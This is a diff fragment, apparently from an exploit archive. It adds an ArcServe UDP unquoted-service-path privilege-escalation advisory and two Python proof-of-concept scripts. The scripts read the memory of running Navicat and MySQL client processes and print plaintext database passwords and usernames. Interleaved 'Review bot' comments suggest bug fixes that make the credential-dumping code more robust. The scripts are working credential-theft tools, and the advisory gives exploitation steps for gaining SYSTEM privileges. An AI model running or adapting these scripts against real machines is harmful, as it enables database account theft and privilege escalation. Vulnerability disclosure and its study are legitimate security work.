ShellExecute(NULL,NULL,a[0],"78",NULL,0);
|
||||
break;
|
||||
}
|
||||
|
||||
|
||||
return 0;
|
||||
|
||||
}
|
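--- a/platforms/windows/local/40335.txt
+++ b/platforms/windows/local/40335.txt
@@ -0,0 +1,72 @@
+Title: ArcServe UDP - Unquoted Service Path Privilege Escalation
+CWE Class: CWE-427: Uncontrolled Search Path Element
+Date: 04/09/2016
+Vendor: ArcServe
+Product: ArcServe UDP Standard Edition for Windows, TRIAL
+Type: Backup Software
+Version: 6.0.3792 Update 2 Build 516
+Download URL: http://arcserve.com/free-backup-software-trial/
+Tested on: Windows 7x86 EN
+Release Mode: coordinated release
+
+
+- 1. Product Description: -
+A comprehensive solution that empowers even a one-person IT department to protect virtual and physical environments with a high degree of simplicity:
+Design and manage your entire data protection strategy with a unified management console
+Scale your data backup coverage as your organization grows with the push of a button
+
+- 2. Vulnerability Details: -
+ArcServe UDP for Windows installs various services.
+One of them is the "Arcserve UDP Update Service (CAARCUpdateSvc)" running as SYSTEM.
+This particular service has an insecurely quoted path.
+Other services where correctly quoted.
+An attacker with write permissions on the root-drive or directory in the search path
+could place a malicious binary and elevate privileges.
+
+- 3. PoC Details: -
+There are various ways to audit for this type of vulnerability.
+This proof-of-concept demonstrates both an automated and manual way.
+
+Step 1: Identify the issue
+Automatic: use the windows-privesc-check toolkit to audit the local system.
+Manual: run 'sc qc CAARCUpdateSvc' and confirm it has an unquoted service path.
+
+Output: C:\Program Files\Arcserve\Unified Data Protection\Update Manager\ARCUpdate.exe
+This should be: "C:\Program Files\Arcserve\Unified Data Protection\Update Manager\ARCUpdate.exe"
+
+Step 2: Assess if exploitation is possible
+To exploit this issue assess the permissions of each folder in the path using space as a token.
+
+If any of the directories is writable for a non-administrative user, try to exploit the issue.
+
+Step 3 Exploitation:
+Place a binary with the correct name in the vulnerable directory.
+Reboot the system and validate your payload is executed with SYSTEM privileges
+
+- 4. Vendor Mitigation: -
+Create an update for the product which add quotes to the path.
+
+While the update is being developed customers could apply a manual fix:
+Open regedit, browse to HKLM\SYSTEM\CurrentControlSet\services
+Add quotes to the ImagePath value of the relevant service.
+
+- 5. End-user Mitigation: -
+A patch has been released by Arcserve.
+All customer should upgrade to the latest version as described in the release notes:
+http://documentation.arcserve.com/Arcserve-UDP/Available/V6/ENU/Bookshelf_Files/HTML/Update3/Default.htm#Update3/upd3_Issues_Fixed.htm%3FTocPath%3D_____6
+
+- 6. Author: -
+sh4d0wman / Herman Groeneveld
+herman_worldwide AT hotmail. com
+
+- 7. Timeline: -
+* 01/06/2016: Vulnerability discovery
+* 18/06/2016: Request sent to info@arcserve.com for a security point-of-contact
+* 21/06/2016: Received contact but no secure channel. Requested confirmation to send PoC over unsecure channel
+* 22/06/2016: vendor supplied PGP key, vulnerability PoC sent
+* 09/07/2016: Received information: 2 out of 3 issues have fixes pending.
+Vendor requests additional mitigation techniques for the third issue.
+* 13/07/2016: Sent vendor various mitigation solutions and their limitations.
+* 13/08/2016: Vendor informs release is pending for all discovered issues.
+* 15/08/2016: Vendor requests text for release bulletin.
+* 19/08/2016: A fix has been released.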
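--- a/platforms/windows/local/40336.py
+++ b/platforms/windows/local/40336.py
@@ -0,0 +1,70 @@
+#####
+# Navicat Premium 11.2.11 (64bit) Local Password Disclosure
+# Tested on Windows Windows Server 2012 R2 64bit, English
+# Vendor Homepage @ https://www.navicat.com/
+# Date 05/09/2016
+# Bug Discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
+#
+# http://www.black-rose.ml
+#
+# Special Thanks & Greetings to friend of mine Viktor Minin (https://www.exploit-db.com/author/?a=8052) | (https://1-33-7.com/)
+#####
+# Navicat Premium client v11.2.11 is vulnerable to local password disclosure, the supplied password is stored in a plaintext format in memory process.
+# A potential attacker could reveal the supplied password in order to gain access to the database.
+# Proof-Of-Concept Code:
+#####
+
+import time
+from winappdbg import Debug, Process
+
+count = 0
+found = 0
+filename = "navicat.exe"
+process_pid = 0
+memory_dump = []
+
+def b2h(str):
+return ''.join(["%02X " % ord(x) for x in str]).strip()
+
+def h2b(str):
+bytes = []
+str = ''.join(str.split(" "))
+for i in range(0, len(str), 2):
+bytes.append(chr(int(str[i:i+2], 16)))
+return ''.join(bytes)
+
+debug = Debug()
+try:
+print "[~] Searching for pid by process name '%s'.." % (filename)
+time.sleep(1)
+debug.system.scan_processes()
+for (process, process_name) in debug.system.find_processes_by_filename(filename):
+process_pid = process.get_pid()
+if process_pid is not 0:
+print "[+] Found process with pid #%d" % (process_pid)
+time.sleep(1)
+print "[~] Trying to read memory for pid #%d" % (process_pid)
+
+process = Process(process_pid)
+for address in process.search_bytes('\x00\x90\x18\x00\x00\x00\x00\x00\x00\x00'):
+memory_dump.append(process.read(address,30))
+memory_dump.pop(0)
+for i in range(len(memory_dump)):
+str = b2h(memory_dump[i])
+first = str.split("00 90 18 00 00 00 00 00 00 00 ")[1]
+last = first.split("00 ")
+if last[0]:
+count = count+1
+found = 1
+print "[+] Password for connection #%d found as %s" % (count, h2b(last[0]))
+if found == 0:
+print "[-] Password not found! Make sure the client is connected at least to one database."
+else:
+print "[-] No process found with name '%s'." % (filename)
+
+debug.loop()
+finally:
+debug.stop()
+
+
+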
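Review bot: `if process_pid is not 0:` in the process loop compares an int with `is`, which tests object identity rather than value and is flagged as a SyntaxWarning by current interpreters; use `if process_pid != 0:` (the same construct appears in 40337.py). `memory_dump.pop(0)` two lines below the read loop raises IndexError when `search_bytes` returned no match, so the "Password not found" message is never reached in that case; guard it with `if memory_dump: memory_dump.pop(0)`. The helpers `b2h` and `h2b` name their parameter `str`, and the scan loop rebinds `str` and `bytes` at module level, shadowing the builtins for the rest of the script.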
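--- a/platforms/windows/local/40337.py
+++ b/platforms/windows/local/40337.py
@@ -0,0 +1,93 @@
+#####
+# MySQL 5.5.45 (64bit) Local Credentials Disclosure
+# Tested on Windows Windows Server 2012 R2 64bit, English
+# Vendor Homepage @ https://www.mysql.com
+# Date 05/09/2016
+# Bug Discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
+#
+# http://www.black-rose.ml
+#
+# Special Thanks & Greetings to friend of mine Viktor Minin (https://www.exploit-db.com/author/?a=8052) | (https://1-33-7.com/)
+#####
+# MySQL v5.5.45 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process.
+# A potential attacker could reveal the supplied username and password in order to gain access to the database.
+# Proof-Of-Concept Code:
+#####
+
+import time
+from winappdbg import Debug, Process
+
+def b2h(str):
+return ''.join(["%02X " % ord(x) for x in str]).strip()
+
+def h2b(str):
+bytes = []
+str = ''.join(str.split(" "))
+
+for i in range(0, len(str), 2):
+bytes.append(chr(int(str[i:i+2], 16)))
+
+return ''.join(bytes)
+
+usr = ''
+pwd = ''
+count = 0
+filename = "mysql.exe"
+process_pid = 0
+memory_dump = []
+passwd = []
+
+debug = Debug()
+try:
+print "[~] Searching for pid by process name '%s'.." % (filename)
+time.sleep(1)
+debug.system.scan_processes()
+for (process, process_name) in debug.system.find_processes_by_filename(filename):
+process_pid = process.get_pid()
+if process_pid is not 0:
+print "[+] Found process pid #%d" % (process_pid)
+time.sleep(1)
+print "[~] Trying to read memory for pid #%d" % (process_pid)
+
+process = Process(process_pid)
+for address in process.search_bytes('\x00\x6D\x79\x73\x71\x6C\x00\x2D\x75\x00'):
+memory_dump.append(process.read(address,30))
+for i in range(len(memory_dump)):
+str = b2h(memory_dump[i])
+first = str.split("00 6D 79 73 71 6C 00 2D 75 00 ")[1]
+last = first.split(" 00 2D 70")
+if last[0]:
+usr = h2b(last[0])
+
+memory_dump = []
+for address in process.search_bytes('\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'):
+memory_dump.append(process.read(address,100))
+sorted(set(memory_dump))
+for i in range(len(memory_dump)):
+str = b2h(memory_dump[i])
+string = str.split('00 8F')
+for x in range(len(string)):
+if x == 1:
+passwd = string
+try:
+pwd = h2b(passwd[1].split('00 00')[0])
+except:
+pass
+
+print "[~] Trying to extract credentials from memory.."
+time.sleep(1)
+if usr != '' and pwd != '':
+print "[+] Credentials found!\r\n----------------------------------------"
+print "[+] Username: %s" % usr
+print "[+] Password: %s" % pwd
+else:
+print "[-] Credentials not found!"
+else:
+print "[-] No process found with name '%s'" % (filename)
+
+debug.loop()
+finally:
+debug.stop()
+
+
+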
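Review bot: The bare `except: pass` around `pwd = h2b(passwd[1].split('00 00')[0])` swallows every exception, including KeyboardInterrupt and errors raised by the debugger itself, and leaves `pwd` silently empty so the failure surfaces only as "Credentials not found!"; catch just what the indexing can raise, `except IndexError: pass`. `sorted(set(memory_dump))` a few lines above discards its return value, so it neither deduplicates nor orders the dump; either assign it back, `memory_dump = sorted(set(memory_dump))`, or delete the line. The `for x in range(len(string)): if x == 1: passwd = string` loop is an indirect way of writing `if len(string) > 1: passwd = string`.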